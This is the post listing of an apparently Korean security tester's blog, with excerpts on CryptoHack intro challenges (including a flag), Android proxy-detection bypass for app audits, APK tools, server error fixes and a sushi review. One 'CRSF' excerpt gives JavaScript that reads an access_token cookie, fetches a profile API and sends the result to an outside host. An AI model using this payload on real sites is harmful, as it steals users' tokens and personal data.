본문 바로가기

전체 글392

[CryptoHack] Finding Flags flag 포맷을 알려주는 문제. 그냥 문제 본문에 쓰여있는 flag를 입력하면 끝. flag: crypto{y0ur_f1rst_fl4g} 2022. 3. 25.
[CryptoHack] register 가입부터 조금 특이함 카이사르 암호를 풀어야 가입이 됨 아래 사이트에서 "URQQP GODCTM VQFFNGT UGC"을 입력해주면 끝. https://www.boxentriq.com/code-breaking/caesar-cipher Caesar Cipher Decoder (online tool) | Boxentriq This is a complete guide to the Caesar cipher and the tools you need to decode it. Learn about its famous history and where it is still in use today, or use the Caesar Cipher tool to solve it automatically. www.boxentri.. 2022. 3. 25.
CRSF 1. fetch 이용하기 var auth = document.cookie.match('(^|;) ?access_token=([^;]*)(;|$)')[2] fetch('/mobile-api/rest/api/v1/mobile/me/profile/',{ headers: { Authorization: 'Bearer ' + auth } }).then(a=>a.text()).then(a=>{location='http://jkns.kr/fsi.php?a='+(btoa(encodeURIComponent(a)))})2. XHR 이용하기 const xhr = new XMLHttpRequest(); xhr.open("GET", "http://jkns.kr/test.h.. 2022. 3. 10.
how to bypass proxy detection in Android 모바일 앱을 검수하다보면 종종 프록시 탐지 기능을 우회해야할 경우가 생긴다. 프록시 탐지 함수를 후킹하여 우회하거나 iptables를 설정하는 방식으로 쉽게 프록시 탐지 기능을 우회할 수 있다. 1. iptables 룰 등록 iptables -t nat -A OUTPUT -p tcp -j DNAT --to-destination 2. iptables 룰 확인 iptables -t nat -L 3. 검수 종료 후 iptables 룰 제거 iptables -t nat -D OUTPUT 1 이때 버프슈트를 이용할 경우 "Support invisible porxying" 기능을 ON 해야하는데 이 옵션은 "Proxy > Options > Proxy Liseners > Edit or.. 2022. 2. 16.
Android Packet Debugging using Proxy tools 1. 모바일 기기와 분석용 pc가 같은 네트워크에 있어야 함. 2. 모바일 네트워크 프록시 세팅 모바일 네트워크 설정에서 분석용 pc로 프록시 세팅 3. 버프슈트나 피들러 등 분석 툴 세팅 끝. P.S. HTTPS도 보고자 한다면 https://burp나 https://:8888 등에서 자기가 사용하는 점검 도구의 인증서를 모바일 기기에 설치하면 됨. 2022. 2. 16.
APK 분석 툴 리스트 1. ClassyShark https://github.com/google/android-classyshark GitHub - google/android-classyshark: Android and Java bytecode viewer Android and Java bytecode viewer. Contribute to google/android-classyshark development by creating an account on GitHub. github.com 2. jadx https://github.com/skylot/jadx GitHub - skylot/jadx: Dex to Java decompiler Dex to Java decompiler. Contribute to skylot/jadx d.. 2022. 2. 16.
how to solve "upstream prematurely closed connection" error flask, uwsgi, nginx 연동 도중 아래와 502 Bad Gateway 에러가 발생. 우선 /var/log/nginx/error.log를 확인했는데, 2022/02/12 00:49:54 [error] 1458540#1458540: *7 upstream prematurely closed connection while reading response header from upstream, client:, server: xxx.kr, request: "GET / HTTP/1.1", upstream: "uwsgi://unix:/tmp/uwsgi.sock:", host: "xxx.kr:80" 이런 에러 로그가 있었다. 삽질 끝에 해결책을 발견했는데, sudo apt install uwsgi.. 2022. 2. 12.
how to fix pip3 error : ImportError: cannot import name 'PackageFinder' from 'pip._internal.index' Traceback (most recent call last): File "/Library/Developer/CommandLineTools/usr/bin/pip3", line 6, in from pip.\_internal import main File "/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/3.8/lib/python3.8/site-packages/pip/\_internal/\_\_init\_\_.py", line 40, in from pip.\_internal.cli.autocompletion import autocomplete File "/Library/Developer/CommandLineToo.. 2022. 1. 30.
how to solve "DNS_PROBE_FINISHED_NXDOMAIN" 나스에 서버 올리고 DNS 신청해서 쓰고 있는데 위와 같은 에러가 발생하면서 종종 바로 안 들어가지는 현상이 발생했다. 원인은 네임서버에 있었는데 DNS 업체 외에 다른 업체도 네임서버에 등록해서 에러가 낫던 것. 네임서버를 한 업체로만 등로했더니 에러 없이 바로 연결 잘 된다. . 2021. 12. 16.
how to solve burp suite "connection refused: connect" error 버프수트를 사용하던 중 아래와 같은 아래가 발생하였다. 해결책은 간단한데, "user options > connections > socks proxy"에서 사용 옵션을 off하면 된다. 2021. 9. 1.
21.08.14. 정자동 / 스시 소라 정자역에 '스시 소라'라는 오마카세 집이 새로 생겼다길래 가봤다. 시작. 지느러미는 꼬들꼬들한데 담백해서 너무 맛있다. 고구마 사케를 주문했는데, 내 취향은 아님 회 까먹음 새콤해서 호로록 먹음 전복 내장 소스를 좋아하는데, 그게 없어서 참 아쉽. 취하진 않아지만 뭔가 해장되는 느낌. 새우 오동토동하니 맛있음. 뭔가 이것저것 알려주셨는데, 결국 집에 가니 다 까먹음 ㅋㅋ. 어쨋든 맛있었다. 계속 가다보면 언젠가 생선 이름도 외워지겠지. 2021. 8. 23.
how to fix VMware NAT Service Error 1067 VMWare를 이용하다보면 종종 NAT 설정이 원활하지 않은 경우가 생긴다. VMWare NAT Service가 정상적으로 실행이 되고 있지 않기 때문인데, 이는 윈도우 서비스에서 해당 서비스를 '시작'함으로써 에러를 해결할 수 있다. 문제는 윈도우 서비스에서 아래의 메시지를 출력하며 VMware NAT Service를 정상적으로 실행시키지 못할 경우. 해결책은 간단한데, VMware를 재설치하거나 '프로그램 제거 또는 변경'에서 Repair 해주면 됨. 2021. 7. 27.